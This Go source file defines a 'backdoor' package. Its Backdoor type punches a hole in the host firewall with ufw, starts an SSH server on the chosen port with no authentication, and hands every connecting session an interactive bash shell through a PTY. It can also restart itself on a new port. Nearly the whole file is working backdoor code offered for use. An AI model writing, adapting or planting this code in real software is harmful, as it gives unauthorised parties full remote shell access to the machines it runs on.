package backdoor

import (
	"errors"
	"fmt"
	ssh "git.tcp.direct/bfu/glider-ssh"
	"git.tcp.direct/bfu/go_to_the_back/proc"
	"github.com/creack/pty"
	"github.com/rs/zerolog"
	"io"
	"os"
	"os/exec"
	"strconv"
	"sync"
)

var (
	// ErrAlreadyActive is an error thrown when
	// a backdoor is requested to start, but is
	// already running.
	ErrAlreadyActive = errors.New("backdoor is already active")
	Logger           = zerolog.New(os.Stdout)
	Doors    = make([]*Backdoor, 0)
	bindAddr string
)

// Door describes the basic functions in a backdoor.
// The basic Backdoor consists of multiple properties
// and these functions.
type Door interface {
	// SetPort will set the port
	// in which the backdoor may receive connections.
	SetPort(port int)
	// Active will return whether the door is active.
	Active() bool
	// Stop will close all connections of a running
	// door at its invocation.
	Stop()
	// Start will allow connections and start running
	// the door.
	Start() error
	// Process returns the process metadata.
	Process() *proc.Process
	// Port returns the backdoor's port.
	Port() int
}

// Backdoor is a structure that inherits Door
// and describes a basic backdoor.
type Backdoor struct {
	// The port of the door.
	port int
	// A synchronization mutex to handle
	// process specific locking.
	mu *sync.Mutex
	// Whether the door is active.
	active bool
	// The process metadata.
	proc     *proc.Process
	hostname string
}

func SetBindAddr(addr string) {
	bindAddr = addr
}

// New will create and return a new, basic Backdoor.
func New(port int) *Backdoor {
	door := &Backdoor{
		// Default port, as it does not exist.
		port: port,
		// The synchronization mutex.
		mu: &sync.Mutex{},
		// The current state.
		active: false,
		// The process metadata (nil).
		proc: nil,
	}
	Doors = append(Doors, door)
	return door
}

func (d *Backdoor) SetPort(port int) {
	d.mu.Lock()
	defer d.mu.Unlock()
	d.port = port
}

func (d Backdoor) Active() bool {
	return d.active
}

func (d *Backdoor) Start() error {
	if d.active {
		return ErrAlreadyActive
	}
	d.mu.Lock()
	d.active = true
	d.hostname = strconv.Itoa(d.port)
	command := exec.Command("ufw", "allow", d.hostname+"/tcp")
	err := command.Run()
	Logger.Err(err)
	ssh.Handle(d.sshHandler)
	go func() {
		srv, err := ssh.ListenAndServe(fmt.Sprintf("%s:%d", bindAddr, d.port), nil)
		d.proc = proc.New(srv)
		Logger.Err(err)
	}()
	Logger.Info().Msgf("started on %d", d.port)
	d.mu.Unlock()
	return nil
}

func (d *Backdoor) Stop() {
	d.mu.Lock()
	d.active = false
	// Close the server
	err := d.Process().Server().Close()
	Logger.Err(err)
	d.mu.Unlock()
}

func (d *Backdoor) Reboot() {
	d.Stop()
	d.SetPort(d.port + 10)
	go d.Start()
}

func (d *Backdoor) sshHandler(session ssh.Session) {
	// literally cap though
	Logger.Info().Msgf("shielded attack from %s", session.RemoteAddr().String())
	command := exec.Command("bash")
	if req, _, valid := session.Pty(); valid {
		command.Env = append(command.Env, fmt.Sprintf("TERM=%s", req.Term))
		file, err := pty.Start(command)
		if err != nil {
			_, _ = session.Write([]byte(err.Error()))
		}
		go func() {
			_, _ = io.Copy(file, session)
		}()
		_, _ = io.Copy(session, file)
		_ = command.Wait()
	}
}

func (d *Backdoor) Process() *proc.Process {
	return d.proc
}

func (d *Backdoor) Port() int {
	return d.port
}
